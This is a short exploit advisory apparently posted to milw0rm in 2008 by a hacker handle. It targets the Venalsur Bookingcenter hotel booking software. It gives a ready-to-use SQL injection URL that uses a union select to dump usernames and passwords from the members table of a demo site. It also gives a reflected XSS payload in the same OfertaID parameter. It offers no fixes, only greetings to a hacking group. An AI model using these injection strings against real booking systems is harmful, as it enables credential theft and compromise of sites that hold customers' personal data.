41 lines
No EOL
1.5 KiB
Text
41 lines
No EOL
1.5 KiB
Text
Booking System for Hotels Group powered by Venalsur Bookingcenter XSS/SQL injetion vulnerability!
|
|
------------------------------------------------------------------------------------------------------
|
|
------------------------------------------------------------------------------------------------------
|
|
Author: d3b4g
|
|
|
|
Greetz: str0ke,,Darkc0de.com,rez0rn,draconyx,godinlaw,hatebreeder And all my friends
|
|
Site : www.bl4ck3nd.info
|
|
Contact: bl4ckend[at]gmail[dot]com
|
|
-------------------------------------------------------------------
|
|
|
|
|
|
-------------------------------------------------------------------
|
|
Dork: N/A
|
|
-------------------------------------------------------------------
|
|
Affected software:
|
|
|
|
-----------------
|
|
Application : Booking System for Hotels Group powered by Venalsur Bookingcenter
|
|
URL : http://www.bookingcentre.eu
|
|
===================================================================
|
|
|
|
Sql injection
|
|
=============
|
|
|
|
|
|
Exploit: http://site.com/www_en/cadena_ofertas_ext.php?OfertaID= [sql]
|
|
|
|
Demo : http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3,concat(username,password),5,6,7,8,9,10,11+from+members/*
|
|
|
|
------------------------------------------------------------------------
|
|
|
|
Xss
|
|
===
|
|
|
|
Exploit:http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=<script>alert(40323.6285846991)</script>
|
|
|
|
=========================================================================
|
|
|
|
Proud to be a maldivian :):) Happy new maldives [29.10.2008]
|
|
|
|
# milw0rm.com [2008-10-29] |